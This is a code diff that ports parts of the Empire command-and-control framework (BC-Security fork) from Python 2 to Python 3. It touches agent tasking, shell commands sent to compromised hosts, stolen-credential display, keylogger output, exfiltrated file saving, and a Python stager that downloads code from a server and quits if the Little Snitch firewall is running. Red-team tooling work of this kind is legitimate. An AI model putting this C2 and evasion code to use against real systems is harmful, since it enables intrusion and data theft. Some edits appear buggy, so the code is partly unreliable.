573 | 575 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
592 | 594 | |
593 | 595 | modules = [] |
594 | 596 | |
595 | for moduleName, module in main.modules.modules.iteritems(): | |
597 | for moduleName, module in main.modules.modules.items(): | |
596 | 598 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Description'])).lower()): |
597 | 599 | |
598 | 600 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
617 | 619 | |
618 | 620 | modules = [] |
619 | 621 | |
620 | for moduleName, module in main.modules.modules.iteritems(): | |
622 | for moduleName, module in main.modules.modules.items(): | |
621 | 623 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Comments'])).lower()): |
622 | 624 | |
623 | 625 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
642 | 644 | |
643 | 645 | modules = [] |
644 | 646 | |
645 | for moduleName, module in main.modules.modules.iteritems(): | |
647 | for moduleName, module in main.modules.modules.items(): | |
646 | 648 | if (searchTerm.lower() == '') or (searchTerm.lower() in ("".join(module.info['Author'])).lower()): |
647 | 649 | |
648 | 650 | moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info) |
731 | 733 | |
732 | 734 | listenerObject = main.listeners.loadedListeners[listener_type] |
733 | 735 | # set all passed options |
734 | for option, values in request.json.iteritems(): | |
735 | if type(values) == unicode: | |
736 | values = values.encode('utf8') | |
736 | for option, values in request.json.items(): | |
737 | if isinstance(values, bytes): | |
738 | values = values.decode('UTF-8') | |
737 | 739 | if option == "Name": |
738 | 740 | listenerName = values |
739 | 741 | |
764 | 766 | for activeAgent in activeAgentsRaw: |
765 | 767 | [ID, session_id, listener, name, language, language_version, delay, jitter, external_ip, internal_ip, username, high_integrity, process_name, process_id, hostname, os_details, session_key, nonce, checkin_time, lastseen_time, parent, children, servers, profile, functions, kill_date, working_hours, lost_limit, taskings, results] = activeAgent |
766 | 768 | |
767 | agents.append({"ID":ID, "session_id":session_id, "listener":listener, "name":name, "language":language, "language_version":language_version, "delay":delay, "jitter":jitter, "external_ip":external_ip, "internal_ip":internal_ip, "username":username, "high_integrity":high_integrity, "process_name":process_name, "process_id":process_id, "hostname":hostname, "os_details":os_details, "session_key":session_key.decode('latin-1').encode("utf-8"), "nonce":nonce, "checkin_time":checkin_time, "lastseen_time":lastseen_time, "parent":parent, "children":children, "servers":servers, "profile":profile,"functions":functions, "kill_date":kill_date, "working_hours":working_hours, "lost_limit":lost_limit, "taskings":taskings, "results":results}) | |
769 | agents.append({"ID":ID, "session_id":session_id, "listener":listener, "name":name, "language":language, "language_version":language_version, "delay":delay, "jitter":jitter, "external_ip":external_ip, "internal_ip":internal_ip, "username":username, "high_integrity":high_integrity, "process_name":process_name, "process_id":process_id, "hostname":hostname, "os_details":os_details, "session_key":session_key, "nonce":nonce, "checkin_time":checkin_time, "lastseen_time":lastseen_time, "parent":parent, "children":children, "servers":servers, "profile":profile,"functions":functions, "kill_date":kill_date, "working_hours":working_hours, "lost_limit":lost_limit, "taskings":taskings, "results":results}) | |
768 | 770 | |
769 | 771 | return jsonify({'agents' : agents}) |
770 | 772 |
351 | 351 | os.makedirs(save_path) |
352 | 352 | |
353 | 353 | # save the file out |
354 | f = open(save_path + "/" + filename, 'w') | |
354 | f = open(save_path + "/" + filename, 'wb') | |
355 | ||
355 | 356 | f.write(data) |
356 | 357 | f.close() |
357 | 358 | finally: |
358 | 359 | self.lock.release() |
359 | 360 | |
360 | 361 | # notify everyone that the file was downloaded |
361 | message = "[+] File {} from {} saved".format(path, sessionID) | |
362 | message = "\n[+] File {} from {} saved".format(path, sessionID) | |
362 | 363 | signal = json.dumps({ |
363 | 364 | 'print': True, |
364 | 365 | 'message': message |
612 | 613 | """ |
613 | 614 | Return agent results from the backend database. |
614 | 615 | """ |
615 | ||
616 | 616 | agent_name = sessionID |
617 | 617 | |
618 | 618 | # see if we were passed a name instead of an ID |
1059 | 1059 | """ |
1060 | 1060 | Add a task to the specified agent's buffer in the database. |
1061 | 1061 | """ |
1062 | ||
1063 | 1062 | agentName = sessionID |
1064 | 1063 | |
1065 | 1064 | # see if we were passed a name instead of an ID |
1120 | 1119 | f = open('%s/LastTask' % (self.installPath), 'w') |
1121 | 1120 | f.write(task) |
1122 | 1121 | f.close() |
1123 | ||
1124 | 1122 | return pk |
1125 | 1123 | |
1126 | 1124 | finally: |
1658 | 1656 | # process the packet and extract necessary data |
1659 | 1657 | responsePackets = packets.parse_result_packets(packet) |
1660 | 1658 | results = False |
1661 | ||
1662 | 1659 | # process each result packet |
1663 | 1660 | for (responseName, totalPacket, packetNum, taskID, length, data) in responsePackets: |
1664 | 1661 | # process the agent's response |
1665 | 1662 | self.process_agent_packet(sessionID, responseName, taskID, data) |
1666 | 1663 | results = True |
1667 | ||
1668 | 1664 | if results: |
1669 | 1665 | # signal that this agent returned results |
1670 | 1666 | message = "[*] Agent {} returned results.".format(sessionID) |
1760 | 1756 | |
1761 | 1757 | elif responseName == "TASK_SYSINFO": |
1762 | 1758 | # sys info response -> update the host info |
1759 | data = data.decode('utf-8') | |
1763 | 1760 | parts = data.split("|") |
1764 | 1761 | if len(parts) < 12: |
1765 | 1762 | message = "[!] Invalid sysinfo response from {}".format(sessionID) |
1769 | 1766 | }) |
1770 | 1767 | dispatcher.send(signal, sender="agents/{}".format(sessionID)) |
1771 | 1768 | else: |
1772 | print("sysinfo:",data) | |
1773 | 1769 | # extract appropriate system information |
1774 | listener = str(parts[1], 'utf-8') | |
1775 | domainname = str(parts[2], 'utf-8') | |
1776 | username = str(parts[3], 'utf-8') | |
1777 | hostname = str(parts[4], 'utf-8') | |
1778 | internal_ip = str(parts[5], 'utf-8') | |
1779 | os_details = str(parts[6], 'utf-8') | |
1780 | high_integrity = str(parts[7], 'utf-8') | |
1781 | process_name = str(parts[8], 'utf-8') | |
1782 | process_id = str(parts[9], 'utf-8') | |
1783 | language = str(parts[10], 'utf-8') | |
1784 | language_version = str(parts[11], 'utf-8') | |
1770 | listener = parts[1] | |
1771 | domainname = parts[2] | |
1772 | username = parts[3] | |
1773 | hostname = parts[4] | |
1774 | internal_ip = parts[5] | |
1775 | os_details = parts[6] | |
1776 | high_integrity = parts[7] | |
1777 | process_name = parts[8] | |
1778 | process_id = parts[9] | |
1779 | language = parts[10] | |
1780 | language_version = parts[11] | |
1785 | 1781 | if high_integrity == 'True': |
1786 | 1782 | high_integrity = 1 |
1787 | 1783 | else: |
1794 | 1790 | self.mainMenu.agents.update_agent_sysinfo_db(sessionID, listener=listener, internal_ip=internal_ip, username=username, hostname=hostname, os_details=os_details, high_integrity=high_integrity, process_name=process_name, process_id=process_id, language_version=language_version, language=language) |
1795 | 1791 | |
1796 | 1792 | sysinfo = '{0: <18}'.format("Listener:") + listener + "\n" |
1797 | sysinfo += '{0: <16}'.format("Internal IP:") + internal_ip + "\n" | |
1793 | sysinfo += '{0: <18}'.format("Internal IP:") + internal_ip + "\n" | |
1798 | 1794 | sysinfo += '{0: <18}'.format("Username:") + username + "\n" |
1799 | sysinfo += '{0: <16}'.format("Hostname:") + hostname + "\n" | |
1795 | sysinfo += '{0: <18}'.format("Hostname:") + hostname + "\n" | |
1800 | 1796 | sysinfo += '{0: <18}'.format("OS:") + os_details + "\n" |
1801 | 1797 | sysinfo += '{0: <18}'.format("High Integrity:") + str(high_integrity) + "\n" |
1802 | 1798 | sysinfo += '{0: <18}'.format("Process Name:") + process_name + "\n" |
1836 | 1832 | |
1837 | 1833 | elif responseName == "TASK_DOWNLOAD": |
1838 | 1834 | # file download |
1835 | if isinstance(data, bytes): | |
1836 | data = data.decode('UTF-8') | |
1837 | ||
1839 | 1838 | parts = data.split("|") |
1840 | 1839 | if len(parts) != 3: |
1841 | 1840 | message = "[!] Received invalid file download response from {}".format(sessionID) |
1847 | 1846 | else: |
1848 | 1847 | index, path, data = parts |
1849 | 1848 | # decode the file data and save it off as appropriate |
1850 | file_data = helpers.decode_base64(data) | |
1849 | file_data = helpers.decode_base64(data.encode('UTF-8')) | |
1851 | 1850 | name = self.get_agent_name_db(sessionID) |
1852 | 1851 | |
1853 | 1852 | if index == "0": |
1920 | 1919 | |
1921 | 1920 | |
1922 | 1921 | elif responseName == "TASK_CMD_WAIT_SAVE": |
1922 | ||
1923 | 1923 | # dynamic script output -> blocking, save data |
1924 | 1924 | name = self.get_agent_name_db(sessionID) |
1925 | 1925 | |
1926 | 1926 | # extract the file save prefix and extension |
1927 | prefix = data[0:15].strip() | |
1928 | extension = data[15:20].strip() | |
1927 | prefix = data[0:15].strip().decode('UTF-8') | |
1928 | extension = data[15:20].strip().decode('UTF-8') | |
1929 | 1929 | file_data = helpers.decode_base64(data[20:]) |
1930 | 1930 | |
1931 | 1931 | # save the file off to the appropriate path |
1953 | 1953 | return |
1954 | 1954 | |
1955 | 1955 | with open(savePath,"a+") as f: |
1956 | if isinstance(data, bytes): | |
1957 | data = data.decode('UTF-8') | |
1956 | 1958 | new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") |
1957 | 1959 | f.write(new_results) |
1958 | 1960 | else: |
2052 | 2054 | self.save_agent_log(sessionID, data) |
2053 | 2055 | message = "[+] Listener for '{}' updated to '{}'".format(sessionID, data) |
2054 | 2056 | signal = json.dumps({ |
2055 | 'print': True, | |
2057 | 'print': False, | |
2056 | 2058 | 'message': message |
2057 | 2059 | }) |
2058 | 2060 | dispatcher.send(signal, sender="agents/{}".format(sessionID)) |
52 | 52 | """ |
53 | 53 | |
54 | 54 | cur = self.conn.cursor() |
55 | ||
56 | 55 | # if we're returning a single credential by ID |
57 | 56 | if self.is_credential_valid(filterTerm): |
58 | 57 | cur.execute("SELECT * FROM credentials WHERE id=? limit 1", [filterTerm]) |
13 | 13 | from builtins import input |
14 | 14 | from builtins import str |
15 | 15 | from builtins import range |
16 | VERSION = "3.0 BC-Security Fork" | |
16 | ||
17 | VERSION = "3.0.3 BC-Security Fork" | |
17 | 18 | |
18 | 19 | from pydispatch import dispatcher |
19 | 20 | |
273 | 274 | |
274 | 275 | # generate the stager |
275 | 276 | menu.do_generate('') |
276 | print('empire.py: line 277') | |
277 | 277 | else: |
278 | 278 | messages.display_stager(targetStager) |
279 | 279 | |
683 | 683 | |
684 | 684 | else: |
685 | 685 | creds = self.credentials.get_credentials(filterTerm=filterTerm) |
686 | ||
686 | ||
687 | 687 | messages.display_credentials(creds) |
688 | 688 | |
689 | 689 | |
1857 | 1857 | if '{} returned results'.format(self.sessionID) in signal: |
1858 | 1858 | results = self.mainMenu.agents.get_agent_results_db(self.sessionID) |
1859 | 1859 | if results: |
1860 | print(helpers.color(results)) | |
1860 | print("\n" + helpers.color(results)) | |
1861 | 1861 | |
1862 | 1862 | |
1863 | 1863 | def default(self, line): |
2236 | 2236 | else: |
2237 | 2237 | # if we're uploading the file as a different name |
2238 | 2238 | uploadname = parts[1].strip() |
2239 | ||
2240 | 2239 | if parts[0] != "" and os.path.exists(parts[0]): |
2241 | 2240 | # Check the file size against the upload limit of 1 mb |
2242 | 2241 | |
2243 | 2242 | # read in the file and base64 encode it for transport |
2244 | open_file = open(parts[0], 'r') | |
2243 | open_file = open(parts[0], 'r', encoding="utf8", errors='ignore') | |
2245 | 2244 | file_data = open_file.read() |
2246 | 2245 | open_file.close() |
2247 | ||
2248 | 2246 | size = os.path.getsize(parts[0]) |
2247 | ||
2249 | 2248 | if size > 1048576: |
2250 | 2249 | print(helpers.color("[!] File size is too large. Upload limit is 1MB.")) |
2251 | 2250 | else: |
2252 | 2251 | # dispatch this event |
2253 | 2252 | message = "[*] Tasked agent to upload {}, {}".format(uploadname, helpers.get_file_size(file_data)) |
2253 | file_data = file_data.encode('UTF-8') | |
2254 | ||
2254 | 2255 | signal = json.dumps({ |
2255 | 2256 | 'print': True, |
2256 | 2257 | 'message': message, |
2266 | 2267 | |
2267 | 2268 | # upload packets -> "filename | script data" |
2268 | 2269 | file_data = helpers.encode_base64(file_data) |
2269 | data = uploadname + "|" + file_data | |
2270 | data = uploadname + "|" + file_data.decode("UTF-8") | |
2270 | 2271 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data) |
2271 | 2272 | else: |
2272 | 2273 | print(helpers.color("[!] Please enter a valid file path to upload")) |
2289 | 2290 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_IMPORT", script_data) |
2290 | 2291 | |
2291 | 2292 | # dispatch this event |
2292 | message = "[*] Tasked agent to import {}: {}".format(path, hashlib.md5(script_data).hexdigest()) | |
2293 | message = "[*] Tasked agent to import {}: {}".format(path, hashlib.md5(script_data.encode('utf-8')).hexdigest()) | |
2293 | 2294 | signal = json.dumps({ |
2294 | 2295 | 'print': False, |
2295 | 2296 | 'message': message, |
2296 | 2297 | 'import_path': path, |
2297 | 'import_md5': hashlib.md5(script_data).hexdigest() | |
2298 | 'import_md5': hashlib.md5(script_data.encode('utf-8')).hexdigest() | |
2298 | 2299 | }) |
2299 | 2300 | dispatcher.send(signal, sender="agents/{}".format(self.sessionID)) |
2300 | 2301 | |
2301 | 2302 | # update the agent log with the filename and MD5 |
2302 | msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data).hexdigest()) | |
2303 | msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data.encode('utf-8')).hexdigest()) | |
2303 | 2304 | self.mainMenu.agents.save_agent_log(self.sessionID, msg) |
2304 | 2305 | |
2305 | 2306 | # extract the functions from the script so we can tab-complete them |
2833 | 2834 | if '{} returned results'.format(self.sessionID) in signal: |
2834 | 2835 | results = self.mainMenu.agents.get_agent_results_db(self.sessionID) |
2835 | 2836 | if results: |
2836 | print(helpers.color(results)) | |
2837 | ||
2837 | print("\n" + helpers.color(results)) | |
2838 | ||
2838 | 2839 | def default(self, line): |
2839 | 2840 | "Default handler" |
2841 | ||
2840 | 2842 | line = line.strip() |
2841 | 2843 | parts = line.split(' ') |
2842 | ||
2844 | ||
2843 | 2845 | if len(parts) > 0: |
2844 | 2846 | # check if we got an agent command |
2845 | 2847 | if parts[0] in self.agentCommands: |
2846 | 2848 | shellcmd = ' '.join(parts) |
2847 | 2849 | # task the agent with this shell command |
2848 | 2850 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd) |
2851 | ||
2852 | # dispatch this event | |
2853 | message = "[*] Tasked agent to run command {}".format(line) | |
2854 | signal = json.dumps({ | |
2855 | 'print': False, | |
2856 | 'message': message, | |
2857 | 'command': line | |
2858 | }) | |
2859 | dispatcher.send(signal, sender="agents/{}".format(self.sessionID)) | |
2860 | ||
2849 | 2861 | # update the agent log |
2850 | 2862 | msg = "Tasked agent to run command " + line |
2851 | 2863 | self.mainMenu.agents.save_agent_log(self.sessionID, msg) |
2852 | 2864 | else: |
2853 | 2865 | print(helpers.color("[!] Command not recognized.")) |
2854 | 2866 | print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.")) |
2855 | ||
2867 | ||
2868 | ||
2856 | 2869 | def do_help(self, *args): |
2857 | 2870 | "Displays the help menu or syntax for particular commands." |
2858 | 2871 | SubMenu.do_help(self, *args) |
2927 | 2940 | "Change an agent's active directory" |
2928 | 2941 | |
2929 | 2942 | line = line.strip() |
2930 | ||
2931 | 2943 | if line != "": |
2932 | 2944 | # have to be careful with inline python and no threading |
2933 | 2945 | # this can cause the agent to crash so we will use try / cath |
2934 | 2946 | # task the agent with this shell command |
2935 | 2947 | if line == "..": |
2936 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir(os.pardir); print "Directory stepped down: %s"' % (line)) | |
2948 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir(os.pardir); print("Directory stepped down: %s")' % (line)) | |
2937 | 2949 | else: |
2938 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir("%s"); print "Directory changed to: %s"' % (line, line)) | |
2950 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir("%s"); print("Directory changed to: %s)"' % (line, line)) | |
2939 | 2951 | |
2940 | 2952 | # dispatch this event |
2941 | 2953 | message = "[*] Tasked agent to change active directory to {}".format(line) |
3010 | 3022 | |
3011 | 3023 | if delay == "": |
3012 | 3024 | # task the agent to display the delay/jitter |
3013 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print 'delay/jitter = ' + str(delay)+'/'+str(jitter)") | |
3025 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print('delay/jitter = ' + str(delay)+'/'+str(jitter))") | |
3014 | 3026 | |
3015 | 3027 | # dispatch this event |
3016 | 3028 | message = "[*] Tasked agent to display delay/jitter" |
3032 | 3044 | self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID) |
3033 | 3045 | self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID) |
3034 | 3046 | |
3035 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print 'delay/jitter set to %s/%s'" % (delay, jitter, delay, jitter)) | |
3047 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (delay, jitter, delay, jitter)) | |
3036 | 3048 | |
3037 | 3049 | # dispatch this event |
3038 | 3050 | message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter) |
3169 | 3181 | "Task an agent to use a shell command." |
3170 | 3182 | |
3171 | 3183 | line = line.strip() |
3172 | ||
3173 | 3184 | if line != "": |
3174 | 3185 | # task the agent with this shell command |
3175 | 3186 | self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", str(line)) |
4471 | 4482 | # if we need to write binary output for a .dll |
4472 | 4483 | if ".dll" in savePath: |
4473 | 4484 | out_file = open(savePath, 'wb') |
4474 | out_file.write(bytearray(stagerOutput)) | |
4485 | ||
4486 | if isinstance(stagerOutput, bytes): | |
4487 | stagerOutput = stagerOutput.decode('latin-1') | |
4488 | ||
4489 | out_file.write(bytearray(stagerOutput,encoding='utf8')) | |
4475 | 4490 | out_file.close() |
4476 | 4491 | else: |
4477 | 4492 | # otherwise normal output |
4478 | 4493 | out_file = open(savePath, 'w') |
4494 | ||
4495 | if isinstance(stagerOutput, bytes): | |
4496 | stagerOutput = stagerOutput.decode('latin-1') | |
4497 | ||
4479 | 4498 | out_file.write(stagerOutput) |
4480 | 4499 | out_file.close() |
4481 | 4500 |
168 | 168 | Generate an AES cipher object, pull out the IV from the data |
169 | 169 | and return the unencrypted data. |
170 | 170 | """ |
171 | ||
172 | 171 | if len(data) > 16: |
173 | 172 | backend = default_backend() |
174 | 173 | IV = data[0:16] |
176 | 175 | decryptor = cipher.decryptor() |
177 | 176 | pt = depad(decryptor.update(data[16:]) + decryptor.finalize()) |
178 | 177 | return pt |
179 | ||
180 | 178 | |
181 | 179 | def verify_hmac(key, data): |
182 | 180 | """ |
200 | 198 | """ |
201 | 199 | Decrypt the data, but only if it has a valid MAC. |
202 | 200 | """ |
203 | ||
204 | 201 | if len(data) > 32 and verify_hmac(key, data): |
205 | 202 | if isinstance(key, str): |
206 | 203 | key = bytes(key, 'latin-1') |
213 | 210 | Generate a random new 128-bit AES key using OS' secure Random functions. |
214 | 211 | """ |
215 | 212 | punctuation = '!#$%&()*+,-./:;<=>?@[\]^_`{|}~' |
216 | return ''.join(random.sample(string.ascii_letters + string.digits + '!#$%&()*+,-./:;<=>?@[\]^_`{|}~', 32)) | |
213 | rng = random.SystemRandom() | |
214 | return ''.join(rng.sample(string.ascii_letters + string.digits + '!#$%&()*+,-./:;<=>?@[\]^_`{|}~', 32)) | |
217 | 215 | |
218 | 216 | |
219 | 217 | def rc4(key, data): |
805 | 805 | From http://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding |
806 | 806 | """ |
807 | 807 | missing_padding = 4 - len(data) % 4 |
808 | if isinstance(data, str): | |
809 | data = data.encode('UTF-8') | |
810 | ||
808 | 811 | if missing_padding: |
809 | 812 | data += b'=' * missing_padding |
810 | 813 |
202 | 202 | name = listenerObject.options['Name']['Value'] |
203 | 203 | nameBase = name |
204 | 204 | |
205 | if isinstance(name, bytes): | |
206 | name = name.decode('UTF-8') | |
207 | ||
205 | 208 | if not listenerObject.validate_options(): |
206 | 209 | return |
207 | 210 |
183 | 183 | print(" ---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------") |
184 | 184 | |
185 | 185 | for agent in agents: |
186 | ||
187 | 186 | if str(agent['high_integrity']) == '1': |
188 | 187 | # add a * to the username if it's high integrity |
189 | 188 | agent['username'] = '*' + str(agent['username']) |
475 | 474 | domain = cred[2] |
476 | 475 | username = cred[3] |
477 | 476 | password = cred[4] |
478 | host = cred[5] | |
479 | ||
477 | if isinstance(cred[5], bytes): | |
478 | host = cred[5].decode('latin-1') | |
479 | else: | |
480 | host = cred[5] | |
480 | 481 | print(" %s%s%s%s%s%s" % ('{0: <8}'.format(credID), '{0: <11}'.format(credType), '{0: <25}'.format(domain), '{0: <17}'.format(username), '{0: <17}'.format(host), password)) |
481 | 482 | |
482 | 483 | print('') |
277 | 277 | RC4IV = data[0 + offset:4 + offset] |
278 | 278 | RC4data = data[4 + offset:20 + offset] |
279 | 279 | routingPacket = encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), RC4data) |
280 | sessionID = routingPacket[0:8].decode('UTF-8') | |
280 | try: | |
281 | sessionID = routingPacket[0:8].decode('UTF-8') | |
282 | except: | |
283 | sessionID = routingPacket[0:8].decode('latin-1') | |
281 | 284 | |
282 | 285 | # B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long |
283 | 286 | (language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:]) |
303 | 306 | break |
304 | 307 | |
305 | 308 | offset += 20 + length |
306 | ||
307 | 309 | return results |
308 | 310 | |
309 | 311 | else: |
358 | 360 | rc4EncData = encryption.rc4(key, data) |
359 | 361 | # return an rc4 encyption of the routing packet, append an HMAC of the packet, then the actual encrypted data |
360 | 362 | if isinstance(encData, str) and sys.version[0] != "2": |
361 | encData = encData.encode('UTF-8') | |
363 | encData = encData.encode('Latin-1') | |
362 | 364 | |
363 | 365 | packet = RC4IV + rc4EncData + encData |
364 | 366 | return packet |
36 | 36 | |
37 | 37 | #---- constants |
38 | 38 | |
39 | _SIGNATURE = 'L\x00\x00\x00' | |
40 | _GUID = '\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F' | |
39 | _SIGNATURE = b'L\x00\x00\x00' | |
40 | _GUID = b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F' | |
41 | 41 | _LINK_INFO_HEADER_DEFAULT = 0x1C |
42 | 42 | _LINK_INFO_HEADER_OPTIONAL = 0x24 |
43 | 43 | |
175 | 175 | return datetime(year, month, day, hour, minute, second) |
176 | 176 | |
177 | 177 | def write_byte(val, buf): |
178 | buf.write(pack('<B', val)) | |
178 | buf.write(pack('<B', val).decode('UTF-8')) | |
179 | 179 | |
180 | 180 | def write_short(val, buf): |
181 | buf.write(pack('<H', val)) | |
181 | buf.write(pack('<H', val).decode('latin-1')) | |
182 | 182 | |
183 | 183 | def write_int(val, buf): |
184 | buf.write(pack('<I', val)) | |
184 | buf.write(pack('<I', val).decode('UTF-8')) | |
185 | 185 | |
186 | 186 | def write_double(val, buf): |
187 | buf.write(pack('<Q', val)) | |
187 | buf.write(pack('<Q', val).decode('UTF-8')) | |
188 | 188 | |
189 | 189 | def write_cstring(val, buf, padding=False): |
190 | 190 | #val = val.encode('unicode-escape').replace('\\\\', '\\') |
191 | 191 | val = val.encode('cp1252') |
192 | buf.write(val + '\x00') | |
192 | buf.write((val + b'\x00').decode('UTF-8')) | |
193 | 193 | if padding and not len(val) % 2: |
194 | 194 | buf.write('\x00') |
195 | 195 | |
196 | 196 | def write_cunicode(val, buf): |
197 | 197 | uni = val.encode('utf-16-le') |
198 | buf.write(uni + '\x00\x00') | |
198 | buf.write((uni + b'\x00\x00').decode('UTF-8')) | |
199 | 199 | |
200 | 200 | def write_sized_string(val, buf, str=True): |
201 | 201 | size = len(val) |
211 | 211 | if str: |
212 | 212 | ret += val.encode('utf-16-le') |
213 | 213 | else: |
214 | ret += val | |
214 | ret += val.encode('UTF-8') | |
215 | 215 | return ret |
216 | 216 | |
217 | 217 | def put_bits(bits, target, start, count, length=16): |
427 | 427 | entry_type = self.type |
428 | 428 | short_name_len = len(self.short_name) + 1 |
429 | 429 | try: |
430 | self.short_name.decode("ascii") | |
430 | if isinstance(self.short_name, bytes): | |
431 | self.short_name.decode("ascii") | |
431 | 432 | short_name_is_unicode = False |
432 | 433 | short_name_len += short_name_len % 2 # padding |
433 | 434 | except (UnicodeEncodeError, UnicodeDecodeError): |
624 | 625 | ret += pack('<I',_SHOW_COMMAND_IDS[self._show_command]) |
625 | 626 | ret += pack('<B',0) #hotkey |
626 | 627 | ret += pack('<B',0) #hotkey |
627 | ret += ('\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') # reserved | |
628 | ret += (b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') # reserved | |
629 | print(ret) | |
628 | 630 | |
629 | 631 | if self.link_flags.has_shell_item_id_list: |
630 | 632 | siil = self.shell_item_id_list.bytes |
631 | 633 | ret += pack('<H',len(siil)) |
632 | ret += siil | |
634 | ret += siil.encode('UTF-8') | |
633 | 635 | # TOFIX / TOINVESTIGATE |
634 | 636 | #if self.link_flags.has_link_info: |
635 | 637 | #self._link_info.write(lnk) |
644 | 646 | if self.link_flags.has_icon: |
645 | 647 | ret += ret_sized_string(self.icon, self.link_flags.is_unicode) |
646 | 648 | |
647 | ret += ('\x00\x00\x00\x00') # header_size | |
649 | ret += (b'\x00\x00\x00\x00') # header_size | |
648 | 650 | return ret |
649 | 651 | |
650 | 652 | def write(self, lnk): |
99 | 99 | Abstracted functionality that invokes the generate_launcher() method for a given listener, |
100 | 100 | if it exists. |
101 | 101 | """ |
102 | ||
102 | 103 | if not listenerName in self.mainMenu.listeners.activeListeners: |
103 | 104 | print(helpers.color("[!] Invalid listener: %s" % (listenerName))) |
104 | 105 | return '' |
418 | 418 | |
419 | 419 | if language.startswith('py'): |
420 | 420 | # Python |
421 | ||
422 | 421 | launcherBase = 'import sys;' |
423 | 422 | if "https" in host: |
424 | 423 | # monkey patch ssl woohooo |
430 | 429 | launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" |
431 | 430 | launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" |
432 | 431 | launcherBase += "out, err = ps.communicate()\n" |
433 | launcherBase += "if re.search(\"Little Snitch\", out):\n" | |
432 | launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n" | |
434 | 433 | launcherBase += " sys.exit()\n" |
435 | 434 | except Exception as e: |
436 | 435 | p = "[!] Error setting LittleSnitch in stager: " + str(e) |
440 | 439 | profile = listenerOptions['DefaultProfile']['Value'] |
441 | 440 | userAgent = profile.split('|')[1] |
442 | 441 | |
443 | launcherBase += "import urllib2;\n" | |
442 | launcherBase += "import urllib.request as urllib;\n" | |
444 | 443 | launcherBase += "UA='%s';" % (userAgent) |
445 | 444 | launcherBase += "server='%s';t='%s';" % (host, stage0) |
446 | 445 | |
447 | 446 | # prebuild the request routing packet for the launcher |
448 | 447 | routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', |
449 | 448 | meta='STAGE0', additional='None', encData='') |
450 | b64RoutingPacket = base64.b64encode(routingPacket) | |
451 | ||
452 | launcherBase += "req=urllib2.Request(server+t);\n" | |
449 | ||
450 | b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8') | |
451 | ||
452 | launcherBase += "req=urllib.Request(server+t);\n" | |
453 | ||
453 | 454 | # add the RC4 packet to a cookie |
454 | 455 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket) |
455 | 456 | |
460 | 461 | headerValue = header.split(':')[1] |
461 | 462 | # launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) |
462 | 463 | launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) |
463 | ||
464 | ||
464 | 465 | if proxy.lower() != "none": |
465 | 466 | if proxy.lower() == "default": |
466 | launcherBase += "proxy = urllib2.ProxyHandler();\n" | |
467 | launcherBase += "proxy = urllib.ProxyHandler();\n" | |
467 | 468 | else: |
468 | 469 | proto = proxy.split(':')[0] |
469 | launcherBase += "proxy = urllib2.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" | |
470 | ||
470 | launcherBase += "proxy = urllib.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" | |
471 | ||
471 | 472 | if proxyCreds != "none": |
472 | 473 | if proxyCreds == "default": |
473 | launcherBase += "o = urllib2.build_opener(proxy);\n" | |
474 | launcherBase += "o = urllib.build_opener(proxy);\n" | |
475 | ||
476 | # add the RC4 packet to a cookie | |
477 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % ( | |
478 | b64RoutingPacket) | |
474 | 479 | else: |
475 | 480 | launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" |
